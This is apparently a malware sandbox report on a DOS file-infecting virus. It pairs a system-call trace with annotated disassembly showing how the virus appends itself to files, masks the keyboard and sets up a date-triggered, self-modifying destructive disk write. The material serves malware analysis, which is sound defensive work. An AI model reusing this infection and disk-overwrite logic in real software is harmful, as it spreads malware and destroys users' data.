Sample viewer

vx.netlux.org/Virus.DOS.Riot.Immortal.546


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:45:39.792848068Z 26 PC: 12b6c | Set disk transfer address
2018-12-17T22:45:39.794336042Z 53 PC: 12b72 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:45:39.796095106Z 53 PC: 12b7f | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:45:39.797385199Z 44 PC: 12b8a | Get time 0x12b8a: cmp dl, 0xd
; Code that runs after the DOS Get Time call traced on the row above; the fragment's
; first instruction (0x12b8a: cmp dl, 0xd) is printed on that row. DL is presumably the
; hundredths-of-a-second field returned by Get Time, so the branch below is timing-dependent.
0x12b8d: jg 0x12b93                      ; signed DL > 0x0d: skip the port write
0x12b8f: mov al, 0x82                    ; mask value with bits 1 and 7 set
0x12b91: out 0x21, al                    ; port 0x21 is the master PIC interrupt-mask register on a PC: 0x82 masks IRQ1 (keyboard) and IRQ7
0x12b93: lea dx, word ptr [bp + 0x2cc]   ; DX = bp-relative buffer, presumably a file name - confirm
0x12b97: call 0x12c87                    ; body not shown; trace rows with PCs 0x12c8c-0x12cd7 (open, read 4, seek, write 546, seek, write 4, close) fall inside this routine
0x12b9a: lea dx, word ptr [bp + 0x2dc]   ; second bp-relative buffer for the same routine
0x12b9e: call 0x12c87                    ; same routine, second target
0x12ba1: mov ah, 0x3c                    ; DOS function 3Ch: create or truncate file
0x12ba3: mov cx, 0                       ; CX = 0: no special file attributes
0x12ba6: lea dx, word ptr [bp + 0x2ee]   ; DS:DX = name of the file to create
0x12baa: int 0x21                        ; traced as "Create or truncate file" at PC 12bac
0x12bac: lea dx, word ptr [bp + 0x2fc]   ; DX = 0x1f-byte buffer that is written to the new file below
0x12bb0: mov si, 0x1f                    ; SI = 0x1f (31), the same count as the write
0x12bb3: call 0x12cd8                    ; helper not shown; takes DX = buffer, SI = length - presumably transforms the buffer in place, confirm
0x12bb6: mov bx, ax                      ; BX = handle for the write; assumes AX still holds the handle from the create call (helper preserves AX) - confirm
0x12bb8: mov ax, 0x4000                  ; AH = 40h: write to file or device
0x12bbb: mov cx, 0x1f                    ; CX = 31 bytes, matching "Write 31 bytes" in the trace
0x12bbe: lea si, word ptr [bp + 0x2fc]   ; SI is not an input of function 40h (buffer is DS:DX); DX is presumably still [bp + 0x2fc]
0x12bc2: int 0x21                        ; traced as "Write file or device" at PC 12bc4
2018-12-17T22:45:39.799950467Z 61 PC: 12c8c | Open file (Filename = '')
2018-12-17T22:45:39.81132513Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:39.817386004Z 66 PC: 12ca9 | Move file pointer
2018-12-17T22:45:39.818726571Z 64 PC: 12cbb | Write file or device (Write 546 bytes on handle 5)
2018-12-17T22:45:40.16841148Z 66 PC: 12cc3 | Move file pointer
2018-12-17T22:45:40.17025936Z 64 PC: 12cce | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:40.17346471Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.189035305Z 61 PC: 12c8c | Open file (Filename = '')
2018-12-17T22:45:40.200201176Z 60 PC: 12bac | Create or truncate file
2018-12-17T22:45:40.21147547Z 64 PC: 12bc4 | Write file or device (Write 31 bytes on handle 5)
2018-12-17T22:45:40.221503344Z 62 PC: 12bd3 | Close file
2018-12-17T22:45:40.22962096Z 44 PC: 12bd7 | Get time 0x12bd7: cmp dl, 0x32
; Code that runs after the second DOS Get Time call traced on the row above; the fragment's
; first instruction (0x12bd7: cmp dl, 0x32) is printed on that row. DL is presumably the
; hundredths-of-a-second field, so the message path below is taken on roughly half of the runs.
0x12bda: jg 0x12c08                      ; signed DL > 0x32: skip the message and the key wait
0x12bdc: mov si, 0x12                    ; SI = 0x12 (18), length passed to the helper
0x12bdf: lea dx, word ptr [bp + 0x1b6]   ; DX = 18-byte bp-relative buffer (the text to display)
0x12be3: call 0x12cd8                    ; helper not shown; presumably decodes the buffer in place before printing - confirm
0x12be6: mov ah, 9                       ; DOS function 09h: print the '$'-terminated string at DS:DX
0x12be8: int 0x21
0x12bea: mov si, 0x12                    ; same length again
0x12bed: call 0x12cd8                    ; helper called a second time; if DX is unchanged this re-applies it to the same buffer (consistent with a reversible encoding) - confirm
0x12bf0: mov ah, 0                       ; BIOS keyboard function 00h: wait for a keystroke
0x12bf2: int 0x16
0x12bf4: jmp 0x12c08                     ; unconditional jump over the next 0x12 bytes
; NOTE(review): 0x12bf6-0x12c07 is 18 bytes, the same length as SI = 0x12 above, and is never
; reached by fall-through. It is most likely the encoded message buffer ([bp + 0x1b6])
; decoded as instructions by a linear-sweep disassembler, not real code - confirm against bp.
0x12bf6: sub byte ptr [si], cl
0x12bf8: or al, 0x2e
0x12bfa: adc dx, word ptr [di]
0x12bfc: and byte ptr [di], cl
0x12bfe: outsw dx, word ptr [si]
0x12bff: je 0x12c75
0x12c01: jno 0x12c63
0x12c03: pushaw
2018-12-17T22:45:40.232186909Z 67 PC: 12cf0 | Get or set file attributes
2018-12-17T22:45:40.238888767Z 65 PC: 12cf4 | Delete file (Filename = '')
2018-12-17T22:45:40.245636489Z 78 PC: 12c24 | Find first file
2018-12-17T22:45:40.252007145Z 61 PC: 12c8c | Open file (Filename = '')
2018-12-17T22:45:40.259551775Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:40.267704737Z 66 PC: 12ca9 | Move file pointer
2018-12-17T22:45:40.269722086Z 64 PC: 12cbb | Write file or device (Write 546 bytes on handle 5)
2018-12-17T22:45:40.283780209Z 66 PC: 12cc3 | Move file pointer
2018-12-17T22:45:40.28782701Z 64 PC: 12cce | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:40.295388281Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.304334373Z 79 PC: 12c24 | Find next file
2018-12-17T22:45:40.308536545Z 61 PC: 12c8c | Open file (Filename = '')
2018-12-17T22:45:40.316610108Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:40.323812886Z 66 PC: 12ca9 | Move file pointer
2018-12-17T22:45:40.326963714Z 64 PC: 12cbb | Write file or device (Write 546 bytes on handle 5)
2018-12-17T22:45:40.336131262Z 66 PC: 12cc3 | Move file pointer
2018-12-17T22:45:40.337798082Z 64 PC: 12cce | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:40.346009395Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.358945159Z 79 PC: 12c24 | Find next file
2018-12-17T22:45:40.362346748Z 61 PC: 12c8c | Open file (Filename = '')
2018-12-17T22:45:40.372648266Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:40.382236193Z 66 PC: 12ca9 | Move file pointer
2018-12-17T22:45:40.396779718Z 64 PC: 12cbb | Write file or device (Write 546 bytes on handle 5)
2018-12-17T22:45:40.405563675Z 66 PC: 12cc3 | Move file pointer
2018-12-17T22:45:40.418937514Z 64 PC: 12cce | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:40.426784932Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.436265168Z 79 PC: 12c24 | Find next file
2018-12-17T22:45:40.440134665Z 61 PC: 12c8c | Open file (Filename = '')
2018-12-17T22:45:40.44811835Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:40.455935211Z 66 PC: 12ca9 | Move file pointer
2018-12-17T22:45:40.458857049Z 64 PC: 12cbb | Write file or device (Write 546 bytes on handle 5)
2018-12-17T22:45:40.468550995Z 66 PC: 12cc3 | Move file pointer
2018-12-17T22:45:40.470404717Z 64 PC: 12cce | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:40.48032029Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.490274966Z 79 PC: 12c24 | Find next file
2018-12-17T22:45:40.493025793Z 61 PC: 12c8c | Open file (Filename = 'yb.com')
2018-12-17T22:45:40.499889643Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:40.507968297Z 66 PC: 12ca9 | Move file pointer
2018-12-17T22:45:40.509832057Z 64 PC: 12cbb | Write file or device (Write 546 bytes on handle 5)
2018-12-17T22:45:40.518458809Z 66 PC: 12cc3 | Move file pointer
2018-12-17T22:45:40.520853306Z 64 PC: 12cce | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:45:40.527933865Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.541868576Z 42 PC: 12c4f | Get date 0x12c4f: cmp dh, 0x11
; Date-triggered branch that runs after the DOS Get Date call traced on the row above; the
; fragment's first instruction (0x12c4f: cmp dh, 0x11) is printed on that row. Get Date
; returns the month in DH and the day in DL.
0x12c52: jl 0x12c7b                      ; month < 0x11 (17): skip. A valid month is 1-12, so this branch is always taken and the code up to 0x12c78 looks unreachable (decimal 11 may have been intended)
0x12c54: cmp dl, 8                       ; day of month
0x12c57: jl 0x12c7b                      ; day < 8: skip
0x12c59: lea dx, word ptr [bp + 0x1b6]   ; DX = the 18-byte bp-relative buffer also used at 0x12bdf
0x12c5d: mov si, 0x12                    ; SI = 0x12 (18), length for the helper
0x12c60: call 0x12cd8                    ; helper not shown; presumably transforms the buffer in place - confirm
0x12c63: mov bx, dx                      ; BX = buffer offset (DS:BX is the transfer address for INT 25h/26h)
0x12c65: mov ah, 0x19                    ; DOS function 19h: get current default drive
0x12c67: int 0x21                        ; AL = drive number (0 = A:)
0x12c69: mov cx, 0x25                    ; CX = 0x25 (37): sector count in the INT 25h/26h convention
0x12c6c: mov dx, 0                       ; DX = 0: starting logical sector in that convention
0x12c6f: push ds
0x12c70: pop es                          ; ES = DS
0x12c71: mov byte ptr [bp + 0x237], 0x26 ; self-modifying store. NOTE(review): if [bp + 0x1b6] is the 18-byte region at 0x12bf6, then [bp + 0x237] is 0x12c77, the operand byte of the int below - confirm bp
0x12c76: int 0x19                        ; as disassembled: INT 19h (bootstrap). With the store above it would execute as INT 26h (absolute disk write) on the current drive, i.e. a destructive payload; the AL/CX/DX/BX setup matches that call
0x12c78: add sp, 2                       ; INT 25h/26h return with the flags word still on the stack; this discards it, which supports the INT 26h reading
0x12c7b: mov ah, 0x1a                    ; DOS function 1Ah: set disk transfer address
0x12c7d: mov dx, 0x80                    ; DS:0080h, the default DTA inside the PSP
0x12c80: int 0x21                        ; traced as "Set disk transfer address" at PC 12c82
2018-12-17T22:45:40.545397654Z 26 PC: 12c82 | Set disk transfer address
2018-12-17T22:45:40.547577057Z 26 PC: 12b6c | Set disk transfer address
2018-12-17T22:45:40.549118612Z 53 PC: 12b72 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:45:40.551253152Z 53 PC: 12b7f | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:45:40.554232387Z 44 PC: 12b8a | Get time 0x12b8a: cmp dl, 0xd
; Second pass through the code after DOS Get Time (trace row above); the fragment's first
; instruction (0x12b8a: cmp dl, 0xd) is printed on that row. DL is presumably the
; hundredths-of-a-second field returned by Get Time, so the branch below is timing-dependent.
0x12b8d: jg 0x12b93                      ; signed DL > 0x0d: skip the port write
0x12b8f: mov al, 0x82                    ; mask value with bits 1 and 7 set
0x12b91: out 0x21, al                    ; port 0x21 is the master PIC interrupt-mask register on a PC: 0x82 masks IRQ1 (keyboard) and IRQ7
0x12b93: lea dx, word ptr [bp + 0x2cc]   ; DX = bp-relative buffer, presumably a file name - confirm
0x12b97: call 0x12c87                    ; body not shown; the trace rows that follow with PCs 0x12c8c-0x12cd7 come from this routine (in this pass: open, read 4 bytes, close, with no 546-byte write)
0x12b9a: lea dx, word ptr [bp + 0x2dc]   ; second bp-relative buffer for the same routine
0x12b9e: call 0x12c87                    ; same routine, second target
0x12ba1: mov ah, 0x3c                    ; DOS function 3Ch: create or truncate file
0x12ba3: mov cx, 0                       ; CX = 0: no special file attributes
0x12ba6: lea dx, word ptr [bp + 0x2ee]   ; DS:DX = name of the file to create
0x12baa: int 0x21                        ; traced as "Create or truncate file" at PC 12bac
0x12bac: lea dx, word ptr [bp + 0x2fc]   ; DX = 0x1f-byte buffer that is written to the new file below
0x12bb0: mov si, 0x1f                    ; SI = 0x1f (31), the same count as the write
0x12bb3: call 0x12cd8                    ; helper not shown; takes DX = buffer, SI = length - presumably transforms the buffer in place, confirm
0x12bb6: mov bx, ax                      ; BX = handle for the write; assumes AX still holds the handle from the create call (helper preserves AX) - confirm
0x12bb8: mov ax, 0x4000                  ; AH = 40h: write to file or device
0x12bbb: mov cx, 0x1f                    ; CX = 31 bytes, matching "Write 31 bytes" in the trace
0x12bbe: lea si, word ptr [bp + 0x2fc]   ; SI is not an input of function 40h (buffer is DS:DX); DX is presumably still [bp + 0x2fc]
0x12bc2: int 0x21                        ; traced as "Write file or device" at PC 12bc4
2018-12-17T22:45:40.557033288Z 61 PC: 12c8c | Open file (Filename = '�B+ə�!-')
2018-12-17T22:45:40.565870435Z 63 PC: 12c9a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:45:40.569056399Z 62 PC: 12cd7 | Close file
2018-12-17T22:45:40.571289342Z 61 PC: 12c8c | Open file (Filename = '@�"��')
2018-12-17T22:45:40.579384256Z 60 PC: 12bac | Create or truncate file
2018-12-17T22:45:40.61888299Z 64 PC: 12bc4 | Write file or device (Write 31 bytes on handle 5)
2018-12-17T22:45:40.623079722Z 62 PC: 12bd3 | Close file
2018-12-17T22:45:40.660245735Z 44 PC: 12bd7 | Get time 0x12bd7: cmp dl, 0x32
; Second pass through the code after the later DOS Get Time call (trace row above); the
; fragment's first instruction (0x12bd7: cmp dl, 0x32) is printed on that row. The trace row
; that follows this fragment ("Display string" at PC 12bea) shows the message path was taken here.
0x12bda: jg 0x12c08                      ; signed DL > 0x32: skip the message and the key wait
0x12bdc: mov si, 0x12                    ; SI = 0x12 (18), length passed to the helper
0x12bdf: lea dx, word ptr [bp + 0x1b6]   ; DX = 18-byte bp-relative buffer (the text to display)
0x12be3: call 0x12cd8                    ; helper not shown; presumably decodes the buffer in place before printing - confirm
0x12be6: mov ah, 9                       ; DOS function 09h: print the '$'-terminated string at DS:DX
0x12be8: int 0x21                        ; the sandbox reports "Could not find end pointer" for this call, i.e. it found no '$' terminator
0x12bea: mov si, 0x12                    ; same length again
0x12bed: call 0x12cd8                    ; helper called a second time; if DX is unchanged this re-applies it to the same buffer (consistent with a reversible encoding) - confirm
0x12bf0: mov ah, 0                       ; BIOS keyboard function 00h: wait for a keystroke
0x12bf2: int 0x16
0x12bf4: jmp 0x12c08                     ; unconditional jump over the next 0x12 bytes
; NOTE(review): 0x12bf6-0x12c07 is 18 bytes, the same length as SI = 0x12 above, and is never
; reached by fall-through. It is most likely the encoded message buffer ([bp + 0x1b6])
; decoded as instructions by a linear-sweep disassembler, not real code - confirm against bp.
0x12bf6: sub byte ptr [si], cl
0x12bf8: or al, 0x2e
0x12bfa: adc dx, word ptr [di]
0x12bfc: and byte ptr [di], cl
0x12bfe: outsw dx, word ptr [si]
0x12bff: je 0x12c75
0x12c01: jno 0x12c63
0x12c03: pushaw
2018-12-17T22:45:40.664047335Z 9 PC: 12bea | Display string (Could not find end pointer)